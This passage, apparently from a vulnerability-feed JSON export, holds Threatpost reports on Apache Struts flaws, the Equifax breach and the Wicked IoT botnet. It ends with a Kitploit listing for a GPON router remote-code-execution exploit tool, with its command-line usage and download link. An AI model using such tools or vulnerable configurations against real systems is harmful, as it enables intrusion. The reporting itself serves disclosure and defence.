Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-09T19:50:52", "id": "THREATPOST:1C2F8B65F8584E9BF67617A331A7B993", "href": "https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:27:47", "description": "Equifax said that an additional 2.4 million Americans have had their [personal data](<https://investor.equifax.com/news-and-events/news/2018/03-01-2018-140531340>) stolen as part of the company\u2019s massive 2017 data breach, including their names and some of their driver\u2019s license information.\n\nThe additional identified victims bring the total of those implicated in what has become the largest data breach of personal information in history to around 148 million people.\n\nThe consumer credit reporting agency on Thursday said that as part of an \u201congoing analysis\u201d it found that these newly identified victims\u2019 names and partial driver\u2019s license numbers were stolen by attackers. However, unlike the previous 145.5 million people who have been identified to date as impacted by the 2017 breach, the Social Security numbers of these additional victims were not impacted.\n\nAttackers were also unable to reach additional license details for this latest slew of impacted victims \u2013 including the state where their licenses were issued and the expiration dates.\n\n\u201cThis is not about newly discovered stolen data,\u201d Paulino do Rego Barros, Jr., interim chief executive officer of Equifax, said in a statement. \u201cIt\u2019s about sifting through the previously identified stolen data, analyzing other information in our databases that was not taken by the attackers, and making connections that enabled us to identify additional individuals.\u201d\n\nEquifax said the new victims were not previously identified because their Social Security numbers were not stolen together with their driver\u2019s license information.\n\n\u201cThe methodology used in the company\u2019s forensic examination of last year\u2019s cybersecurity incident leveraged Social Security Numbers (SSNs) and names as the key data elements to identify who was affected by the cyberattack,\u201d said the company in a statement. \u201cThis was in part because forensics experts had determined that the attackers were predominately focused on stealing SSNs.\u201d\n\nEquifax said it will notify the newly identified consumers directly by U.S. Postal mail, \u201cand will offer identity theft protection and credit file monitoring services at no cost to them,\u201d said the company.\n\nThe company did not respond to requests for further comment from Threatpost about its current ongoing analysis of the breach.\n\n**Ongoing Breach Disclosures**\n\nEquifax has been under public scrutiny since September, that\u2019s when it first disclosed the data breach after issuing a statement at the time that cybercriminals had exploited an unnamed \u201cU.S. website application vulnerability to gain access to certain files\u201d from May through July 2017. Equifax said it discovered the breach on July 29. The breach enabled criminals to access sensitive data like social security numbers, birth dates, and license numbers.\n\nLater, during Equifax\u2019s testimony in October before the U.S. House Committee on Energy and Commerce Subcommittee on Digital Commerce and Consumer Protection, it was revealed that Equifax was notified in March that the breach was tied to an unpatched [Apache Struts vulnerability, CVE-2017-5638](<https://threatpost.com/oracle-patches-apache-struts-reminds-users-to-update-equifax-bug/128151/>). It was established that while Equifax said it had requested the \u201capplicable personnel responsible\u201d to update the vulnerability it never was fixed.\n\n\u201cIt appears that the breach occurred because of both human error and technology failures,\u201d Richard Smith, Equifax CEO at the time, wrote in a [testimony](<http://docs.house.gov/meetings/IF/IF17/20171003/106455/HHRG-115-IF17-Wstate-SmithR-20171003.pdf>) that was released at the hearing in October.\n\nMaking the breach worse was Equifax\u2019s further botched response to the breach.\n\nAfter the breach was revealed in September, the company\u2019s site was crushed with traffic from concerned customers that left the site unreachable. In a separate instance in October, the Equifax site came under fire for harboring [adware](<https://threatpost.com/equifax-takes-down-compromised-page-redirecting-to-adware-download/128406/>) in a third-party partner\u2019s Flash Player download.\n\nThe extent and scope of the breach also has been continually expanding since it was first disclosed in September. In October, after an analysis with security company Mandiant, the company said that an [additional](<https://threatpost.com/equifax-says-145-5m-affected-by-breach-ex-ceo-testifies/128247/>) 2.5 million customers were also impacted on top of the 143 million the company initially said were affected.\n\nMeanwhile, in February, documents submitted by Equifax to the US Senate Banking Committee revealed that attackers also accessed taxpayers identification numbers, email addresses, and credit card expiration dates for certain customers.\n\n**Renewed Anger**\n\nThis latest slew of impacted customers has renewed anger against the company, with some demanding stricter legislation for data protection \u2013 such as the proposed Data Breach Prevention and Compensation Act, which would impose strict security-related fines on credit reporting agencies.\n\n> My office is continuing our investigation of [#Equifax](<https://twitter.com/hashtag/Equifax?src=hash&ref_src=twsrc%5Etfw>) so we can get to the bottom of how this disastrous data breach happened. \n> \n> We also need to change the law.\n> \n> \u2014 Eric Schneiderman (@AGSchneiderman) [March 1, 2018](<https://twitter.com/AGSchneiderman/status/969229077814108160?ref_src=twsrc%5Etfw>)\n\n> This is unacceptable. The California Department of Justice will continue to get to the bottom of this massive cybersecurity incident. We are committed to holding [#Equifax](<https://twitter.com/hashtag/Equifax?src=hash&ref_src=twsrc%5Etfw>) accountable to the fullest extent of the law. <https://t.co/fRPrUWcIyg>\n> \n> \u2014 Xavier Becerra (@AGBecerra) [March 1, 2018](<https://twitter.com/AGBecerra/status/969330796774359040?ref_src=twsrc%5Etfw>)\n\nEquifax, meanwhile, continues to remain under investigation by several federal and state agencies, including a probe by the Consumer Financial Protection Bureau.\n\nCustomers can see if their personal information has been breached by clicking on an \u201cAm I Impacted\u201d tool on Equifax\u2019s [website](<https://www.equifaxsecurity2017.com/>). The company also advised consumers to visit its web portal where they can review their account statements and credit reports, identify any unauthorized activity, and protect their personal information from attack.\n\nThe company handles data on more than 820 million customers and 91 million businesses worldwide.\n", "cvss3": {}, "published": "2018-03-02T15:12:57", "type": "threatpost", "title": "Equifax Says 2.4 Million More People Impacted By Massive 2017 Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-03-02T15:12:57", "id": "THREATPOST:AD5395CA5B3FD95FAD8E67B675D0AFCA", "href": "https://threatpost.com/equifax-adds-2-4-million-more-people-to-list-of-those-impacted-by-2017-breach/130209/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:58", "description": "Malicious traffic stemming from exploits against the [Apache Struts 2 vulnerability](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>) disclosed and [patched](<https://cwiki.apache.org/confluence/display/WW/S2-045>) this week has tapered off since Wednesday.\n\nResearchers at Rapid7 published an [analysis](<https://community.rapid7.com/community/infosec/blog/2017/03/09/apache-jakarta-vulnerability-attacks-in-the-wild>) of data collected from its honeypots situated on five major cloud providers and a number of private networks that shows a couple of dozen sources have targeted this vulnerability, but only two, originating in China, have actually sent malicious commands.\n\nCisco Talos said on Thursday that attacks had [risen sharply](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>) since word leaked of publicly available exploits and a [Metasploit module](<https://github.com/rapid7/metasploit-framework/issues/8064>). But it conceded that it was difficult to ascertain whether probes for vulnerable Apache servers could be carried out benignly.\n\nRapid7 said that in a 72-hour period starting Tuesday, a handful of events cropped up peaking at fewer than 50 between 11 a.m. and 6 p.m. Wednesday.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2017/03/06230023/pastedImage_1.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/03/06230023/pastedImage_1.png>)\n\n\u201cWe are really seeing limited attempts to exploit the vulnerability,\u201d said Tom Sellers, threat analyst and security researcher at Rapid7. \u201cFor context, please keep in mind that our data is from honeypots hosted in cloud providers and may not reflect what other sensors and organizations are seeing.\u201d\n\nCraig Williams, Cisco Talos senior technical lead, said researchers there are seeing attack traffic trending downward as well.\n\n\u201cEarly indicators and past experiences were pointing to this being an ongoing issue with attackers continuing to seek out vulnerable machines. Interestingly, over the last couple days, we have seen a slowing of activity,\u201d Williams said. \u201cBecause this is so unusual, we are continuing to monitor the situation in case the trend starts moving in the other direction. Again, this is not typical for this type of issue but great news all the same.\u201d\n\nThe vulnerability is in the Jakarta Multipart parser that comes with Apache. An attacker can trivially exploit the vulnerability to gain remote code execution by sending a HTTP request that contains a crafted Content-Type value. The vulnerable software will throw an exception in such cases.\n\n\u201cWhen the software is preparing the error message for display, a flaw in the Apache Struts Jakarta Multipart parser causes the malicious Content-Type value to be executed instead of displayed,\u201d Sellers wrote in an analysis published yesterday.\n\nThe vulnerability was disclosed and patched on Monday, and by Tuesday, Rapid7 was seeing two malicious requests from a host geo-located in Zhengzhou, China. The attacks arrived in HTTP GET requests and issued commands to the vulnerable webserver for it to download binaries from the attacker-controlled server on the internet. Sellers called it a standard command-injection attack against a webserver where the attacker is able to write code that instructs the server to reach out to an IP address and download code that executes on the server.\n\nThe second attack was spotted Wednesday when a host in Shanghai, China sent HTTP POST requests to servers instructing them to disable their firewall and grab code related to the XOR DDoS malware family.\n\n\u201cWhile we\u2019ve seen a couple dozen sources exploiting the vulnerability, only those two issued malicious commands,\u201d Sellers said. \u201cWe\u2019ve actually seen a drop off in related traffic since Wednesday. The most active attacker stopped on Thursday around 4 a.m. U.S. Central time.\u201d\n\nSellers said it\u2019s unclear as to why there\u2019s been a dropoff in malicious traffic.\n\n\u201cIt could be caused by a number of factors. The malicious payload is pretty obvious and easy to filter if traffic is inspected,\u201d Sellers said. \u201cAttackers might be prioritizing other vulnerabilities such as the ones announced in cameras recently. The lull may be temporary and we may see activity rise again after attention moves on to efforts.\u201d\n\nCisco raised the issue of IoT devices running the vulnerable Apache software as well, which could be an indicator of initial interest from DDoS bots.\n\n\u201cGiven the low sample size it\u2019s difficult for me to say.It\u2019s possible that DDoS bots are the early adopters since infection would generate easy, repeatable income and the code was trivial to port to existing frameworks,\u201d Sellers said. \u201cCompare that to ransomware, where a new deployment mechanism may need to be written but would likely only result in a single payout per host.\u201d\n\nResearchers were also seeing a number of requests probing for additional vulnerable servers that included whoami and ifconfig, commands that are relatively benign but could return information about what context the server is running in. Servers running at root\u2014an uncommon practice\u2014are most at risk.\n", "cvss3": {}, "published": "2017-03-10T10:51:01", "type": "threatpost", "title": "Apache Attack Traffic Dropping, Limited to Few Sources", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-10T16:12:17", "id": "THREATPOST:AACAA4F654495529E053D43901F00A81", "href": "https://threatpost.com/apache-attack-traffic-dropping-limited-to-few-sources/124227/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:28:31", "description": "Equifax, the credit agency behind this summer\u2019s breach of 143 million Americans, said this week the number of victims implicated in the breach has increased.\n\nPaulino do Rego Barros, Jr., the company\u2019s interim CEO, [announced Monday](<https://www.equifaxsecurity2017.com/>) that 2.5 million additional Americans were also impacted, bringing the grand total to 145.5 million affected individuals.\n\nEquifax initially called its investigation around the breach \u201csubstantially complete,\u201d but said it was still carrying out further analysis with Mandiant, a FireEye company it hired to investigate the breach, on the incident. According to Equifax, investigators didn\u2019t find any additional vulnerabilities. The extra 2.5 million Americans figure came \u201cduring Mandiant\u2019s completion of the remaining investigative tasks and quality assurance procedures built into the investigative process.\u201d\n\nThe company used the opportunity on Monday to reiterate that Canadian citizens were also impacted, although far fewer than initially thought. The company said there may have been up to 100,000 Canadians affected several weeks ago however upon closer inspection, only 8,000 Canadian consumers were affected by the breach.\n\nEquifax says its still analyzing exactly how many United Kingdom consumers have been affected by the breach and is in the middle discussions with regulators to determine how to notify them.\n\nDetails about the breach came out the day before Richard Smith, Equifax\u2019s former CEO, was scheduled to testify about the breach before the U.S. House Committee on Energy and Commerce Subcommittee on Digital Commerce and Consumer Protection. Smith, former Equifax chairman and chief executive, [retired last Tuesday](<https://threatpost.com/oracle-patches-apache-struts-reminds-users-to-update-equifax-bug/128151/>) in wake of the breach.\n\nIn a [written testimony (.PDF)](<http://docs.house.gov/meetings/IF/IF17/20171003/106455/HHRG-115-IF17-Wstate-SmithR-20171003.pdf>) released in tandem with the subcommittee hearing, Smith blamed the breach on a combination of \u201chuman error and technology failures.\u201d\n\n\u201cThese mistakes \u2013 made in the same chain of security systems designed with redundancies \u2013 allowed criminals to access over 140 million Americans\u2019 data,\u201d Smith wrote.\n\nIn the testimony Smith claimed that the U.S. Department of Homeland Security\u2019s Computer Emergency Readiness Team (U.S. CERT) notified Equifax on March 8 that [it needed to patch CVE-2017-5638](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>), the Apache Struts vulnerability that eventually led to the hack.\n\nEquifax requested the \u201capplicable personnel responsible\u201d update Apache Struts via email on March 9, something that should have been done within a 48 hour period, Smith said.\n\nThat was never done and according to Smith, the vulnerability wasn\u2019t picked up by internal scans designed to identify vulnerable systems carried out on March 15. The issue lingered for roughly two months until attackers accessed Equifax\u2019s systems on May 13 \u2013 and persisted until the company became aware of the attackers on July 30.\n\nGreg Walden (R-Ore.) pointed out some of Equifax\u2019s many missteps on Tuesday morning, including how Equifax\u2019s consumer facing website for the breach was put hosted on a separate domain from the main Equifax website, the confusion that spawned, and how on multiple occasions Equifax directed users to the wrong website.\n\n\u201cOn top of all the other issues, multiple times Equifax tweeted the wrong URL directing consumers to the wrong website to check if they were part of a breach,\u201d Walden said, \u201cTalk about ham-handed responses this is simply unacceptable and it makes me wonder if there was a breach response plan in place at all and if anyone was in charge of executing that plan.\u201d\n\nDuring another part of the hearing, Tim Murphy, a U.S. representative for Pennsylvania\u2019s 18th Congressional district, came back to that question. When told the company\u2019s original site couldn\u2019t handle the traffic is received, Murphy was befuddled.\n\n\u201cWhy wouldn\u2019t your website be able to handle this kind of traffic?\u201d Murphy asked, \u201cIt just doesn\u2019t make sense, a company your size and with your knowledge, doesn\u2019t understand how to handle traffic for over 100 million people, don\u2019t you use an Elastic cloud computing service that would\u2019ve accounted for this?\u201d\n\nSmith said the sheer amount of traffic Equifax\u2019s site received in wake of the breach made hosting a site on its domain impossible.\n\n\u201cThe environment the micro site is in is a cloud environment that\u2019s very, very scalable,\u201d Smith said. \u201cOur traditional environment could not handle 400 million consumer visits for three weeks.\u201d\n\nMurphy also grilled Smith on what took Equifax so long to patch the March vulnerability and if it\u2019s possible Equifax\u2019s internal scanning system could potentially miss another vulnerability.\n\n\u201cIf the patch only took a few days to apply why did Equifax fail to apply it in March when it was announced as critical?\u201d Murphy asked.\n\nSmith skirted the question and instead discussed the difficulties associated with patching.\n\n\u201cPatching can take a variety of time\u2026 it can take days or up to a week or more,\u201d Smith said, adding that he wasn\u2019t aware of the particular Struts vulnerability at the time.\n\nAt the end of the hearing, when pressed by Anna Eshoo, U.S. Representative for California\u2019s 18th congressional district, Smith described the process around patching again but did little to deviate from his prepared testimony.\n\n\u201cI want to know when they did it, when they took care of [the patch]\u201d Eshoo said.\n\n\u201cThey took care of it in July because we never found it,\u201d Smith said. \u201cWe had the human error, we did the scan, the technology never found it, in July we found suspicious activity, took the portal down, found the vulnerability, applied the patch.\u201d\n", "cvss3": {}, "published": "2017-10-03T15:27:08", "type": "threatpost", "title": "Equifax Says 145.5M Affected by Breach, Ex-CEO Testifies", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-10-03T15:27:08", "id": "THREATPOST:5E633FD1C6A5B5BB74F1B6A8399001A2", "href": "https://threatpost.com/equifax-says-145-5m-affected-by-breach-ex-ceo-testifies/128247/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-30T05:52:43", "description": "Yet another variant of the Mirai botnet has appeared on the scene, but this one has a twist: The code is integrated with at least three exploits that target unpatched IoT devices, including closed-circuit cameras and Netgear routers. It also has ties to a web of other botnets, made for DDoS attacks, which can all be traced back to one threat actor.\n\nThe original [Mirai](<https://threatpost.com/a-mirai-botnet-postscript-lessons-learned/130529/>) used traditional brute-force attempts to gain access to connected things in order to enslave them, but the Wicked Botnet, named after the underground handle chosen by its author, prefers to go the exploit route to gain access.\n\nFortinet\u2019s FortiGuard Labs team [analyzed](<https://www.fortinet.com/blog/threat-research/a-wicked-family-of-bots.html>) the botnet, and found that the exploits it uses are matched to the ports it uses.\n\n\u201cIt scans ports 8080, 8443, 80 and 81 by initiating a raw socket SYN connection; if a connection is established, it will attempt to exploit the device and download its payload,\u201d explained researchers Rommel Joven and Kenny Yang, in the analysis. \u201cIt does this by writing the exploit strings to the socket. The exploit to be used depends on the specific port the bot was able to connect to.\u201d\n\nSpecifically, port 8080 brings an exploit for a flaw in [Netgear](<https://threatpost.com/netgear-fixes-50-vulnerabilities-in-routers-switches-nas-devices/128230/>) DGN1000 and DGN2200 v1 routers (also used by the [Reaper botnet](<https://threatpost.com/hackers-prepping-iotroop-botnet-with-exploits/128608/>)); a connection to port 81 makes use of a CCTV-DVR remote code execution flaw; port 8443 connections use a command injection exploit for the Netgear R7000 and R6400 routers ([CVE-2016-6277](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6277>)); and port 80 corresponds with an invoker shell in compromised web servers. The latter does not directly exploit the device, but instead takes advantage of compromised web servers with malicious web shells already installed.\n\n\u201cSince a lot of IoT malware (e.g. Mirai) have already attacked devices via default passwords/ brute-forcing, new attacks like Wicked bot are forced to take a different option like the use of exploits to become effective,\u201d explained Joven, in an interview with Threatpost.\n\nThey also uncovered that Wicked is a botnet that\u2019s used to download another botnet. Rather than just equipping Wicked itself with the ability to carry out whatever action the criminal behind the bot wants, the author wanted to separate the distribution and its payload.\n\n\u201cThis has advantages in development as well to evade detection,\u201d Joven told us. \u201cThe same goes with other malware (e.g. ransomware) which has a document or script to download the ransomware payload.\u201d\n\n**A Wicked Web of Botnets**\n\nThe analysts also found that the Wicked bot is connected to other, previous Mirai-based botnets; in fact, in terms of payloads, Wicked is built to download them. This led them to the author behind the Wicked bot.\n\nThey essentially followed a trail of breadcrumbs: For one, the Wicked bot\u2019s code contains a the string called \u201cSoraLOADER,\u201d which seems to indicate that it\u2019s a spreader for the Sora botnet, another Mirai variant.\n\nHowever, the malicious website that houses the bad code contains the name \u201cOwari,\u201d which is the name of yet another Mirai variant.\n\nOn top of that, the payload that it delivers is not Owari at all, but rather the Omni bot, which based on its code can be used for DDoS attack similar to Mirai.\n\n\u201cAt the time of analysis, the Owari bot samples could no longer be found in the website directory,\u201d the researchers explained. \u201c[However], we doublechecked the history of the malicious website and confirmed that it had previously delivered the Owari botnet.\u201d\n\nThus, it would seem that Omni, Owari and Sora are all connected to the Wicked bot.\n\n\u201cFuzzing the website\u2019s /bins directory, we found other Omni samples in the directory, which were reported to be delivered using the [GPON vulnerability](<https://threatpost.com/millions-of-home-fiber-routers-vulnerable-to-complete-takeover/131593/>) (CVE-2018-10561),\u201d the researchers said. \u201cPayloads are regularly updated, as shown by its timestamp.\u201d\n\nPutting this connection together with an interview last April conducted by NewSky Security, the researchers were able to trace the new bot back to an author using the pseudonym \u201cWicked\u201d in which he confirmed himself as the author of both Sora and Owari.\n\n\u201cApparently, as seen in the /bins repository, Sora and Owari botnet samples have now both been abandoned and replaced with Omni,\u201d Fortinet\u2019s Joven and Yang said. \u201cThis also leads us to the conclusion that while the Wicked bot was originally meant to deliver the Sora botnet, it was later repurposed to serve the author\u2019s succeeding projects.\u201d\n\nSean Newman, director of product management at Corero Network Security, said via email that while the rash of [Mirai variants](<https://threatpost.com/mirai-variant-targets-financial-sector-with-iot-ddos-attacks/131056/>) is unsurprising given that the source code leaked two years ago, \u201cthe suggestion that hackers don\u2019t get it right every time, with some variants apparently abandoned before they were actively used, is both interesting and concerning.\u201d\n\nHe added, \u201cThe fact that hackers can even experiment with their innovation in the wild on live systems, without being detected, further highlights the scale of the challenge that the poor security posture of IoT devices presents.\u201d\n", "cvss3": {}, "published": "2018-05-21T13:01:56", "type": "threatpost", "title": "Wicked Botnet Uses Passel of Exploits to Target IoT", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-6277", "CVE-2018-10561"], "modified": "2018-05-21T13:01:56", "id": "THREATPOST:A76574D355121BF2CD247CC2DEB6022B", "href": "https://threatpost.com/wicked-botnet-uses-passel-of-exploits-to-target-iot/132125/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-28T05:48:46", "description": "A critical remote code-execution vulnerability in Apache Struts 2, the popular open-source framework for developing web applications in the Java programming language, is threatening a wide range of applications, even when no additional plugins have been enabled. Successful exploitation could lead to full endpoint and eventually network compromise, according to researchers \u2013 who said that the flaw is more dangerous than the similar vulnerability used to compromise Equifax last year.\n\nA [working exploit](<https://threatpost.com/poc-code-surfaces-to-exploit-apache-struts-2-vulnerability/136921/>) surfaced within a day of its disclosure.\n\nThe vulnerability ([CVE-2018-11776](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11776>)) was [patched](<https://cwiki.apache.org/confluence/display/WW/S2-057>) by the Apache Software Foundation yesterday and affects all supported versions of Struts 2: Users of Struts 2.3 should upgrade to 2.3.35; users of Struts 2.5 need to upgrade to 2.5.17. They should do so as soon as possible, given that bad actors are likely already working on exploits, according to the Semmle research team\u2019s Man Yue Mo, who uncovered the flaw.\n\n\u201cThis vulnerability affects commonly-used endpoints of Struts, which are likely to be exposed, opening up an attack vector to malicious hackers,\u201d he said in a [posting](<https://semmle.com/news/apache-struts-CVE-2018-11776>) on Wednesday. \u201cOn top of that, the weakness is related to the Struts Object-Graph Navigation Language (OGNL) language, which hackers are very familiar with, and are known to have been exploited in the past.\u201d\n\n[OGNL](<https://commons.apache.org/proper/commons-ognl/>) is a powerful, domain-specific language that is used to customize Struts\u2019 behavior.\n\n\u201cOn the whole, this is more critical than the highly critical Struts RCE vulnerability that the Semmle Security Research Team discovered and announced last September,\u201d said Yue Mo, referring to the infamous vulns (CVE-2017-9805) that hackers used to compromise Equifax last year, which led to the lifting of [personal details of 147 million consumers](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>).\n\nTim Mackey, technology evangelist at Synopsys, told Threatpost that this is due to the fact that it affects a wider swath of the Struts architecture.\n\n\u201cIn the case of CVE-2018-11776, the root cause [is] a lack of input validation on the URL passed to the Struts framework,\u201d he explained. \u201cThe prior [Struts] vulnerabilities were all in code within a single functional area of the Struts code. This meant that developers familiar with that functional area could quickly identify and resolve issues without introducing new functional behaviors. CVE-2018-11776 operates at a far deeper level within the code, which in turns requires a deeper understanding of not only the Struts code itself, but the various libraries used by Struts. It is this level of understanding which is of greatest concern \u2013 and this concern relates to any library framework.\u201d\n\n## Anatomy of the Flaw\n\nThe vulnerability is caused by insufficient validation of untrusted user data in the core of the Struts framework, according to the team\u2019s findings.\n\n\u201cAttackers can attack vulnerable applications by injecting their own namespace as a parameter in an HTTP request,\u201d they explained. \u201cThe value of that parameter is insufficiently validated by the Struts framework, and can be any OGNL string.\u201d\n\nBecause the issue affects the core of Struts, there are at least two separate attack vectors \u2013 and potentially many more.\n\nIn the first attack scenario, three Struts result types are unsafe when used without a namespace, as defined in either in the Struts configuration file or in Java code if the Struts Convention plugin is used. These are the redirect action, which redirects the visitor to a different URL; action chaining, which is a method to chain multiple actions into a defined sequence or workflow; and postback result, which renders the current request parameters as a form which immediately submits a postback to the specified destination chain or postback.\n\nThe researchers explained: \u201cAn example of a struts.xml configuration that is potentially vulnerable: the <action \u2026> tag does not have a namespace attribute and contains a result of type redirectAction. If you use the Struts Convention plugin, you will also have to look for actions and results that are configured using Java code.\u201d\n\nThe second attack vector has to do with the fact that Struts supports page templates inside <result> tags in the Struts configuration: \u201cThe use of URL tags in such pages is potentially unsafe if the template is referred to from an <action> tag that does not provide a namespace attribute (or specifies a wildcard namespace),\u201d the researchers said. \u201cYour application is vulnerable if the template contains an <s:url \u2026> tag without an action or value attribute.\u201d\n\nResearchers noted that for an exploit for either of the known vectors to be successful, an application must have the alwaysSelectFullNamespace flag set to \u201ctrue\u201d in the Struts configuration \u2013 a default state if the application uses the popular Struts Convention plugin. Also, the application\u2019s actions must be configured without specifying a namespace, or with a wildcard namespace (e.g. \u201c/*\u201d).\n\n\u201cThis applies to actions and namespaces specified in the Struts configuration file (e.g. <action namespace=\u201dmain\u201d>), but also to actions and namespaces specified in Java code if you are using the Struts Convention plugin,\u201d they explained.\n\nThat said, they also cautioned that other attack vectors may emerge that apply to different configurations.\n\n\u201cWhether or not a Struts application is vulnerable to remote code execution largely depends on the exact configuration and architecture of the application,\u201d the firm said. \u201cNote that even if an application is currently not vulnerable, an inadvertent change to a Struts configuration file may render the application vulnerable in the future. You are therefore strongly advised to upgrade your Struts components, even if you believe your configuration not to be vulnerable right now.\u201d\n\nThis is a critical point, according to Mackey. \u201cValidating the input to a function requires a clear definition of what is acceptable,\u201d he said. \u201cIt equally requires that any functions available for public use document how they use the data passed to them. Absent the contract such definitions and documentation form, it\u2019s difficult to determine if the code is operating correctly or not. This contract becomes critical when patches to libraries are issued as its unrealistic to assume that all patches are free from behavioral changes. Modern software is increasingly complex and identifying how data passes through it should be a priority for all software development teams.\u201d\n\nPavel Avgustinov, vice president of QL Engineering at Semmle, laid out what\u2019s at stake in a media statement: \u201cCritical remote code-execution vulnerabilities like the [one that affected Equifax](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>) and the one we announced [this week] are incredibly dangerous for several reasons: Struts is used for publicly-accessible customer-facing websites, vulnerable systems are easily identified, and the flaw is easy to exploit,\u201d he said. \u201cA hacker can find their way in within minutes, and exfiltrate data or stage further attacks from the compromised system. It\u2019s crucially important to update affected systems immediately; to wait is to take an irresponsible risk.\u201d\n", "cvss3": {}, "published": "2018-08-23T16:46:57", "type": "threatpost", "title": "Apache Struts 2 Flaw Uncovered: \u2018More Critical Than Equifax Bug\u2019", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-9805", "CVE-2018-11776"], "modified": "2018-08-23T16:46:57", "id": "THREATPOST:D5150098043DAE7CDF2E31618C33F5D2", "href": "https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "kitploit": [{"lastseen": "2023-06-23T15:18:28", "description": "[![](https://4.bp.blogspot.com/-luQU0AVLnS8/WvJwBnjP90I/AAAAAAAALGk/J-jOgYvAQx8mk-JiqH52gKbylyqFM4K-wCLcBGAs/s640/GPON_1.png)](<https://4.bp.blogspot.com/-luQU0AVLnS8/WvJwBnjP90I/AAAAAAAALGk/J-jOgYvAQx8mk-JiqH52gKbylyqFM4K-wCLcBGAs/s1600/GPON_1.png>)\n\n \n**RCE on GPON home [routers](<https://www.kitploit.com/search/label/Routers>) (CVE-2018-10561)** \n \n**Vulnerability** \n\n\nMany routers today use GPON internet, and a way to bypass all authentication on the devices (**CVE-2018-10561**) was found by [VPNMentor](<https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/>). With this authentication bypass, it's also possible to unveil another [command injection](<https://www.kitploit.com/search/label/Command%20Injection>) [vulnerability](<https://www.kitploit.com/search/label/Vulnerability>) (**CVE-2018-10562**) and execute commands on the device.\n\nAt the time it was written almost ONE MILLION of these devices are exposed to the Internet, according to [Shodan](<https://www.shodan.io/search?query=title%3A%22GPON+Home+Gateway%22>).\n\n \n**Dependencies required** \n`requests` \n`urllib2` \n \n**Tested on** \n`Kali Linux` \n`Ubuntu 17.10 Server` \n \n**Usage** \n\n \n \n python gpon_rce.py TARGET_URL COMMAND\n \n\ne.g. \n\n \n \n python gpon_rce.py http://192.168.1.15 'id'\n \n\n \n**Screenshots** \n\n\n[![](https://1.bp.blogspot.com/-f3m-Pr4tfTg/WvJwIFn_ixI/AAAAAAAALGo/Ns81egu5N5MQiNQ6OzkB-Prf8_Q96Fm9QCLcBGAs/s640/GPON_2.png)](<https://1.bp.blogspot.com/-f3m-Pr4tfTg/WvJwIFn_ixI/AAAAAAAALGo/Ns81egu5N5MQiNQ6OzkB-Prf8_Q96Fm9QCLcBGAs/s1600/GPON_2.png>)\n\n \n \n\n\n**[Download GPON](<https://github.com/f3d0x0/GPON>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-05-09T21:34:00", "type": "kitploit", "title": "GPON - Python Exploit For Remote Code Executuion On GPON Home Routers (CVE-2018-10562)", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10561", "CVE-2018-10562"], "modified": "2018-05-09T21:34:10", "id": "KITPLOIT:4583746754784092967", "href": "http://www.kitploit.com/2018/05/gpon-python-exploit-for-remote-code.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T15:18:09", "description": " 